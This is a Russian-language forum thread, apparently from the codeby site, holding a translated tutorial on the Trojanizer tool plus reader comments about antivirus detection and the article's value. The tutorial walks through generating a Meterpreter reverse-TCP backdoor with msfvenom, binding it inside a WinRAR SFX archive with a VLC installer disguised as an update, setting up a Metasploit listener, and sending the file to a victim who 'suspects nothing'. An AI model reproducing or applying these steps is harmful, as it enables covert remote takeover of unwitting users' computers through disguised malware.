• Открыта запись на вторую часть курса по анонимности и безопасности в сети интернет "Paranoid II" от команды codeby. Анонимные роутеры, Подъём, настройка и администрирование Tor-ноды, Работа с железом ПК, Удаление аппаратных закладок, Минимизация рисков, Авторские разработки и многое другое. Подробнее ...

Статья Джоиним зловред и легитимный файл между собой

SooLFaa

SooLFaa

Администратор
15.07.2016
814
1 319
Здарова бандиты и прочая кибернечисть. С новым подгончиком.
Первоисточник:
Перевод:
Перевод выполнен от команды Codeby
Примечание от команды форума:
  • Статья является переводом.
  • Статья исключительно в ознакомительных целях.
Инструмент Trojanizer использует WinRAR (SFX), чтоб сжать два файла между собой и преобразовать их в исполняемый архив SFX (.exe). SFX-архив при работе запускает оба файла (наш payload и легальное приложение одновременно).

Откуда скачать?

git clone https://github.com/r00t-3xp10it/trojanizer.git

Джоиним зловред и легитимный файл между собой


Далее создаем пейлоад, используя msfvenom

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.1.111 lport=4466 -f exe > /root/Desktop/backdoor.exe

Джоиним зловред и легитимный файл между собой


Запуск Trojanizer

Переходим в папку с Trojanizer и запускаем Trojanizer.sh файл. У Trojanizer есть зависимости, которые нужны для работы тулзы, он попробует их поставить сам, но в случае неудачи, установите следующие пакеты: Wine Program Files, WinRAR Software and Zenity.

Джоиним зловред и легитимный файл между собой


Джоиним зловред и легитимный файл между собой


После запуска откроется форма для сжатия. Здесь можно выбрать пейлоад, который мы создали, используя msfvenom, в самом начале.

Джоиним зловред и легитимный файл между собой


После выбора пейлоада, откроется другое окно под названием Legit Application to Trojanize

Джоиним зловред и легитимный файл между собой


Далее нужно выбрать любой исполняемый файл (.exe), который хотим связать с нашей нагрузкой. Я связываю VLC Player Installer File с моей нагрузкой.

Джоиним зловред и легитимный файл между собой


После того, как вы нажмете ОК, необходимо будет задать новое имя для файла. Сохраните его как файл инсталлятор. Например, vlc-32bit-Installer или vlc-update64 или по вашему выбору.

Джоиним зловред и легитимный файл между собой


Теперь необходимо выбрать иконку для нашего инсталлятора. Вы можете выбрать из списка по умолчанию или загрузить любой файл с иконкой в формате (.ico) из Google.

Джоиним зловред и легитимный файл между собой


Как можно видеть из приведенного выше скрина, я добавил файл vlc-icon.ico как иконку.
Примечание: Trojanizer действует с WINRAR и вследствие этого иконка не связывается с архивными файлами. Вместо этого показывается иконка WinRAR.
После выбора файла иконки выпадает окно, сообщающее путь к новому файлу инсталлятору.

Джоиним зловред и легитимный файл между собой


А теперь давайте поднимем Listener в Metasploit:
Код:
msf > use exploit/multi/handler
msf exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
msf exploit(multi/handler) > set lhost 192.168.1.111
msf exploit(multi/handler) > set lport 4466
msf exploit(multi/handler) > run -j
Джоиним зловред и легитимный файл между собой


Отправляем вредоносную программу на машину жертвы любым удобным способом.

Когда пользователь откроет файл, он получит обычное предупреждение о безопасности, как показано ниже.

Джоиним зловред и легитимный файл между собой


После того, как жертва нажмет RUN, у пользователя начнет работать VLC installer, и он ничего не заподозрит.

Джоиним зловред и легитимный файл между собой


Но в тоже время, у нас будет meterpreter сессия, как показано ниже.

Джоиним зловред и легитимный файл между собой


Именно так можно связать файл нашу нагрузку с любым файлом программного обеспечения (.exe) с использованием Trojanizer.
 
Последнее редактирование:
gushmazuko

gushmazuko

Red Team
24.03.2017
159
388
Как на счет детекта? AV не ругается на склейку, если сам payload не палимый?
 
W

WhiteHacK

Happy New Year
18.08.2019
39
7
А в чем собственно концептуальная разница между ручной сборкой SFX и этой через скрипт, кроме удобства разве что есть ли еще какие нибудь преимущества?
 
  • Нравится
Реакции: leonardocs
T

Tony

Happy New Year
21.09.2019
86
11
В чём способ обхода av? Любой уважающий себя av красный флаг ставит, по умолчанию на sfx архив, я уж не говорю о пост распаковке. Сейчас бы в 2K19 статьи писать о поделках школьников с гитхаба и говорить о пороге входа на форум.
 
SooLFaa

SooLFaa

Администратор
15.07.2016
814
1 319
В чём способ обхода av? Любой уважающий себя av красный флаг ставит, по умолчанию на sfx архив, я уж не говорю о пост распаковке. Сейчас бы в 2K19 статьи писать о поделках школьников с гитхаба и говорить о пороге входа на форум.
Что? Где написано хоть слово про способ обхода AV?!
В остальном вопросы задавайте самому автору. Мы лишь перевели.
А в чем собственно концептуальная разница между ручной сборкой SFX и этой через скрипт, кроме удобства разве что есть ли еще какие нибудь преимущества?
Разве что шеллкод полиглот генерирурет.

Как на счет детекта? AV не ругается на склейку, если сам payload не палимый?
Да вроде не детектится. Только я не пробовал.
 
T

Tony

Happy New Year
21.09.2019
86
11
Что? Где написано хоть слово про способ обхода AV?!
Жаль скрин не сделал)) Uhzpysq nh.r))
В остальном вопросы задавайте самому автору. Мы лишь перевели.
Смысл в переводе? Зачем? Ты считаешь данная техника актуальна в наше время? Или эта статья ради контента?
 
T

Tony

Happy New Year
21.09.2019
86
11
Извини его. Дело в том что в статье было, действительно, написано про обход ав. Но из-за досадной ошибки и невнимательности.
Я уже понял. Вопрос был не конкретно к ТС, а к codeby вобщем. Создам тему с хотелками.
 
  • Нравится
Реакции: mrOkey
Vander

Vander

CodebyTeam
Gold Team
16.01.2016
1 453
4 291
 
  • Нравится
Реакции: gushmazuko
SooLFaa

SooLFaa

Администратор
15.07.2016
814
1 319
Я уже понял. Вопрос был не конкретно к ТС, а к codeby вобщем. Создам тему с хотелками.
Всё верно. Я скопировал старый шаблони забыл удалить старое предложение про "Bypass AV" на что мне указали модераторы после публикации моего предыдущего ответа. Приношу свои извинения. А так же будет очень здорово, если ты сам накидаешь ссылок на интересные топики, которые было бы интересно перевести.
 
Последнее редактирование:
The Codeby

The Codeby

ООО Кодебай
30.12.2015
3 249
4 661
Создам тему с хотелками
Вопрос был не конкретно к ТС, а к codeby вобщем
Нет, ошиблись со ссылкой для переводчицы. Просто контент ради контента нам не нужен.
 
  • Нравится
Реакции: Tony и gushmazuko
Ondrik8

Ondrik8

prodigy
Happy New Year
08.11.2016
1 006
2 990
кибер-нечисть тебя в серьезно даже не восприняла...)) наивный)))))) как всегда, улыбнул..
напиши что нить нормальное и не позорься у тя имя нароботанное , че ты всякую х-ю людям впарива-шь?! я знаю ты можешь! напиши хоть в привате))
 
Последнее редактирование:
  • Нравится
Реакции: Lisenok и Air7771
SearcherSlava

SearcherSlava

Red Team
10.06.2017
705
1 033
согласен)))
все что лежит на гитхабе в общ. доступе это уже палится!
Здрав будь! Что в Гугл попало - то пропало. Создатели сайта называют GitHub «социальной сетью для разработчиков». Кроме размещения кода, участники могут общаться, комментировать правки друг друга, а также следить за новостями знакомых = сверхмногомерный массив данных для анализа психологии поведения пользователей и выявления их пожеланий и предпочтений. Всё по чесноку.
Всё по чесноку.jpg
 
Последнее редактирование:
SooLFaa

SooLFaa

Администратор
15.07.2016
814
1 319
кибер-нечисть тебя в серьезно даже не восприняла...)) наивный)))))) как всегда, улыбнул..
напиши что нить нормальное и не позорься у тя имя нароботанное , че ты всякую х-ю людям впарива-шь?! я знаю ты можешь! напиши хоть в привате))
Это не моя статья. Будь внимателен, первоисточник указан. Я лишь выложил перевод, который делал тоже не я
 
Lisenok

Lisenok

Happy New Year
02.04.2016
123
71
кибер-нечисть тебя в серьезно даже не восприняла...)) наивный)))))) как всегда, улыбнул..
напиши что нить нормальное и не позорься у тя имя нароботанное , че ты всякую х-ю людям впарива-шь?! я знаю ты можешь! напиши хоть в привате))
Поддерживаю Ваше высказывание насчет этого, очень неожиданная статья для администратора форума кодеби.
P.S. даже если она , тем более, лишь перевод и перевод выполнен не этим участником форума.
 
mrOkey

mrOkey

Red Team
14.11.2017
628
725
Поддерживаю Ваше высказывание насчет этого, очень неожиданная статья для администратора форума кодеби.
Да это перевод, господи же боже, сколько раз вам надо написать в теме, что это перевод
 
SooLFaa

SooLFaa

Администратор
15.07.2016
814
1 319
Поддерживаю Ваше высказывание насчет этого, очень неожиданная статья для администратора форума кодеби.
P.S. даже если она , тем более, лишь перевод и перевод выполнен не этим участником форума.
А от меня рекомендую почитать мою последнюю статью: Misconfiguration в сервисах разработки
 
  • Нравится
Реакции: Lisenok
Мы в соцсетях: